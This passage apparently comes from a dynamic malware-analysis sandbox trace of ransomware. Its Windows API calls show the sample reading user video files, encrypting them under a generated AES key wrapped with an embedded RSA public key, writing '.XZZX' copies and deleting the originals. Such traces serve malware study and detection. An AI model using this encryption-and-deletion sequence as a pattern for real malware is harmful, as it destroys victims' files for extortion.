hFile=0x6b0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0132.204] GetUserNameW (in: lpBuffer=0x420e1f8, pcbBuffer=0x420dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x420dfe0) returned 1 [0132.246] wsprintfW (in: param_1=0x420dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0132.246] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe4 | out: phkResult=0x420dfe4*=0x6c8) returned 0x0 [0132.247] RegQueryValueExW (in: hKey=0x6c8, lpValueName="E1010314", lpReserved=0x0, lpType=0x420dfd8, lpData=0x420dfec, lpcbData=0x420dfdc*=0x4 | out: lpType=0x420dfd8*=0x4, lpData=0x420dfec*=0xb7, lpcbData=0x420dfdc*=0x4) returned 0x0 [0132.247] RegCloseKey (hKey=0x6c8) returned 0x0 [0132.247] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe8 | out: phkResult=0x420dfe8*=0x6c8) returned 0x0 [0132.247] RegSetValueExW (in: hKey=0x6c8, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x420dfec*=0xb8, cbData=0x4 | out: lpData=0x420dfec*=0xb8) returned 0x0 [0132.247] RegCloseKey (hKey=0x6c8) returned 0x0 [0132.247] VirtualFree (lpAddress=0x40f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.247] VirtualFree (lpAddress=0x4350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.247] CloseHandle (hObject=0x6b0) returned 1 [0132.248] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0132.249] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0132.249] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\i2GwNYb4B.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\o903hcw\\i2gwnyb4b.mp4")) returned 1 [0132.249] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\i2GwNYb4B.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\o903hcw\\i2gwnyb4b.mp4")) returned 0 Thread: id = 448 os_tid = 0xa50 [0132.130] lstrcpyA (in: lpString1=0x469fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0132.130] lstrcpyW (in: lpString1=0x469f460, lpString2="NxtD.flv" | out: lpString1="NxtD.flv") returned="NxtD.flv" [0132.130] lstrcpyW (in: lpString1=0x469e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\" [0132.130] SetErrorMode (uMode=0x1) returned 0x1 [0132.130] lstrcpyW (in: lpString1=0x469f860, lpString2="NxtD.flv" | out: lpString1="NxtD.flv") returned="NxtD.flv" [0132.130] CoCreateGuid (in: pguid=0x469e440 | out: pguid=0x469e440*(Data1=0x534929ce, Data2=0x15a9, Data3=0x4b4a, Data4=([0]=0xa1, [1]=0x0, [2]=0x50, [3]=0xbe, [4]=0x75, [5]=0x5c, [6]=0x2a, [7]=0xb8))) returned 0x0 [0132.130] wsprintfW (in: param_1=0x469ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\NxtD.flv") returned 75 [0132.130] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x469fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0132.130] wsprintfW (in: param_1=0x469e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\FBBA7EFE065EC5DA534929CE0AC8AA22.XZZX") returned 104 [0132.130] StrStrW (lpFirst="NxtD.flv", lpSrch="XZZX") returned 0x0 [0132.130] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\NxtD.flv", dwFileAttributes=0x20) returned 1 [0132.131] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\NxtD.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\o903hcw\\nxtd.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6b0 [0132.131] ReadFile (in: hFile=0x6b0, lpBuffer=0x4378cf8, nNumberOfBytesToRead=0xad5d, lpNumberOfBytesRead=0x469e418, lpOverlapped=0x0 | out: lpBuffer=0x4378cf8*, lpNumberOfBytesRead=0x469e418*=0xad5d, lpOverlapped=0x0) returned 1 [0132.132] CloseHandle (hObject=0x6b0) returned 1 [0132.132] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0132.132] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40a0000 [0132.133] SetErrorMode (uMode=0x1) returned 0x1 [0132.133] lstrcpyW (in: lpString1=0x469e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0132.133] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cf7840) returned 1 [0132.136] CryptGenKey (in: hProv=0x3cf7840, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3d10f98) returned 1 [0132.358] CryptExportKey (in: hKey=0x3d10f98, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x469e41c | out: pbData=0x0*, pdwDataLen=0x469e41c*=0x94) returned 1 [0132.358] CryptExportKey (in: hKey=0x3d10f98, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40a0000, pdwDataLen=0x469e41c | out: pbData=0x40a0000*, pdwDataLen=0x469e41c*=0x94) returned 1 [0132.358] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0132.358] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0132.358] CryptDestroyKey (hKey=0x3d10f98) returned 1 [0132.358] CryptReleaseContext (hProv=0x3cf79d8, dwFlags=0x0) returned 0 [0132.359] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\FBBA7EFE065EC5DA534929CE0AC8AA22.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\o903hcw\\fbba7efe065ec5da534929ce0ac8aa22.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6c8 [0132.359] WriteFile (in: hFile=0x6c8, lpBuffer=0x4378cf8*, nNumberOfBytesToWrite=0xad5d, lpNumberOfBytesWritten=0x469e438, lpOverlapped=0x0 | out: lpBuffer=0x4378cf8*, lpNumberOfBytesWritten=0x469e438*=0xad5d, lpOverlapped=0x0) returned 1 [0132.360] SetFilePointer (in: hFile=0x6c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xad5d [0132.360] WriteFile (in: hFile=0x6c8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x469e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x469e438*=0x5, lpOverlapped=0x0) returned 1 [0132.360] SetFilePointer (in: hFile=0x6c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xad62 [0132.360] WriteFile (in: hFile=0x6c8, lpBuffer=0x469f860*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x469e438, lpOverlapped=0x0 | out: lpBuffer=0x469f860*, lpNumberOfBytesWritten=0x469e438*=0x10, lpOverlapped=0x0) returned 1 [0132.360] SetFilePointer (in: hFile=0x6c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xad72 [0132.360] WriteFile (in: hFile=0x6c8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x469e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x469e438*=0x5, lpOverlapped=0x0) returned 1 [0132.360] SetFilePointer (in: hFile=0x6c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xad77 [0132.361] SetErrorMode (uMode=0x1) returned 0x1 [0132.361] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0132.361] OutputDebugStringW (lpOutputString="end") [0132.361] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v0\x88Ê\x03`Õi\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x469dbf4, pcbBinary=0x469d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x469dbf4, pcbBinary=0x469d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0132.361] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x469dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x469d3dc, pcbStructInfo=0x469d3d8 | out: pvStructInfo=0x469d3dc, pcbStructInfo=0x469d3d8) returned 1 [0132.361] CryptAcquireContextW (in: phProv=0x469d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x469d3e4*=0x3cf7a60) returned 1 [0132.362] CryptImportPublicKeyInfo (in: hCryptProv=0x3cf7a60, dwCertEncodingType=0x1, pInfo=0x3cf1780*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cf17b0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cf17b8*, PublicKey.cUnusedBits=0x0), phKey=0x469d3ec | out: phKey=0x469d3ec*=0x3d10f98) returned 1 [0132.362] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0132.362] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0132.362] CryptEncrypt (in: hKey=0x3d10f98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x469d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x469d3f0*=0x80) returned 1 [0132.362] CryptEncrypt (in: hKey=0x3d10f98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cf7ae8*, pdwDataLen=0x469d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cf7ae8*, pdwDataLen=0x469d3e8*=0x80) returned 1 [0132.362] WriteFile (in: hFile=0x6c8, lpBuffer=0x3cf7ae8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x469e438, lpOverlapped=0x0 | out: lpBuffer=0x3cf7ae8*, lpNumberOfBytesWritten=0x469e438*=0x80, lpOverlapped=0x0) returned 1 [0132.362] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0132.362] WriteFile (in: hFile=0x6c8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x469e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x469e438*=0x5, lpOverlapped=0x0) returned 1 [0132.363] GetUserNameW (in: lpBuffer=0x469e1f8, pcbBuffer=0x469dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x469dfe0) returned 1 [0132.363] wsprintfW (in: param_1=0x469dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0132.363] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x469dfe4 | out: phkResult=0x469dfe4*=0x6d4) returned 0x0 [0132.363] RegQueryValueExW (in: hKey=0x6d4, lpValueName="E1010314", lpReserved=0x0, lpType=0x469dfd8, lpData=0x469dfec, lpcbData=0x469dfdc*=0x4 | out: lpType=0x469dfd8*=0x4, lpData=0x469dfec*=0xb8, lpcbData=0x469dfdc*=0x4) returned 0x0 [0132.363] RegCloseKey (hKey=0x6d4) returned 0x0 [0132.363] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x469dfe8 | out: phkResult=0x469dfe8*=0x6d4) returned 0x0 [0132.363] RegSetValueExW (in: hKey=0x6d4, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x469dfec*=0xb9, cbData=0x4 | out: lpData=0x469dfec*=0xb9) returned 0x0 [0132.363] RegCloseKey (hKey=0x6d4) returned 0x0 [0132.363] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.364] VirtualFree (lpAddress=0x40a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.364] CloseHandle (hObject=0x6c8) returned 1 [0132.365] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0132.365] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0132.365] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\NxtD.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\o903hcw\\nxtd.flv")) returned 1 [0132.367] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\NxtD.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\o903hcw\\nxtd.flv")) returned 0 Thread: id = 449 os_tid = 0xa54 [0132.294] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0132.294] lstrcpyW (in: lpString1=0x420f460, lpString2="6OPfc4qVaMTq.flv" | out: lpString1="6OPfc4qVaMTq.flv") returned="6OPfc4qVaMTq.flv" [0132.294] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\" [0132.294] SetErrorMode (uMode=0x1) returned 0x1 [0132.294] lstrcpyW (in: lpString1=0x420f860, lpString2="6OPfc4qVaMTq.flv" | out: lpString1="6OPfc4qVaMTq.flv") returned="6OPfc4qVaMTq.flv" [0132.294] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xb87d0318, Data2=0x46ad, Data3=0x42f7, Data4=([0]=0x99, [1]=0x47, [2]=0xcf, [3]=0xe6, [4]=0xca, [5]=0xd3, [6]=0xbb, [7]=0xa1))) returned 0x0 [0132.294] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\6OPfc4qVaMTq.flv") returned 69 [0132.294] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0132.294] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\DB53A738127CCAEBB87D0318169DAF33.XZZX") returned 90 [0132.294] StrStrW (lpFirst="6OPfc4qVaMTq.flv", lpSrch="XZZX") returned 0x0 [0132.294] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\6OPfc4qVaMTq.flv", dwFileAttributes=0x20) returned 1 [0132.295] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\6OPfc4qVaMTq.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xarijr5atdl\\6opfc4qvamtq.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6c8 [0132.295] ReadFile (in: hFile=0x6c8, lpBuffer=0x4383a60, nNumberOfBytesToRead=0x18609, lpNumberOfBytesRead=0x420e418, lpOverlapped=0x0 | out: lpBuffer=0x4383a60*, lpNumberOfBytesRead=0x420e418*=0x18609, lpOverlapped=0x0) returned 1 [0132.296] CloseHandle (hObject=0x6c8) returned 1 [0132.296] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x40f0000 [0132.296] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x4210000 [0132.297] SetErrorMode (uMode=0x1) returned 0x1 [0132.297] lstrcpyW (in: lpString1=0x420e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0132.297] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cf79d8) returned 1 [0132.299] CryptGenKey (in: hProv=0x3cf79d8, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3cde658) returned 1 [0132.501] CryptExportKey (in: hKey=0x3cde658, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x420e41c | out: pbData=0x0*, pdwDataLen=0x420e41c*=0x94) returned 1 [0132.501] CryptExportKey (in: hKey=0x3cde658, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x4210000, pdwDataLen=0x420e41c | out: pbData=0x4210000*, pdwDataLen=0x420e41c*=0x94) returned 1 [0132.501] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0132.502] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0132.502] CryptDestroyKey (hKey=0x3cde658) returned 1 [0132.502] CryptReleaseContext (hProv=0x3cf7b70, dwFlags=0x0) returned 0 [0132.502] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\DB53A738127CCAEBB87D0318169DAF33.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xarijr5atdl\\db53a738127ccaebb87d0318169daf33.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6c4 [0132.502] WriteFile (in: hFile=0x6c4, lpBuffer=0x4383a60*, nNumberOfBytesToWrite=0x18609, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x4383a60*, lpNumberOfBytesWritten=0x420e438*=0x18609, lpOverlapped=0x0) returned 1 [0132.504] SetFilePointer (in: hFile=0x6c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x18609 [0132.504] WriteFile (in: hFile=0x6c4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0132.504] SetFilePointer (in: hFile=0x6c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1860e [0132.504] WriteFile (in: hFile=0x6c4, lpBuffer=0x420f860*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x420f860*, lpNumberOfBytesWritten=0x420e438*=0x20, lpOverlapped=0x0) returned 1 [0132.504] SetFilePointer (in: hFile=0x6c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1862e [0132.504] WriteFile (in: hFile=0x6c4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0132.504] SetFilePointer (in: hFile=0x6c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x18633 [0132.504] SetErrorMode (uMode=0x1) returned 0x1 [0132.504] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0132.504] OutputDebugStringW (lpOutputString="end") [0132.504] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v0\x88Ê\x03`Õ \x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0132.504] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x420dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8 | out: pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8) returned 1 [0132.504] CryptAcquireContextW (in: phProv=0x420d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x420d3e4*=0x3cf7bf8) returned 1 [0132.505] CryptImportPublicKeyInfo (in: hCryptProv=0x3cf7bf8, dwCertEncodingType=0x1, pInfo=0x3cf1850*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cf1880*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cf1888*, PublicKey.cUnusedBits=0x0), phKey=0x420d3ec | out: phKey=0x420d3ec*=0x3cde658) returned 1 [0132.505] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0132.505] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0132.505] CryptEncrypt 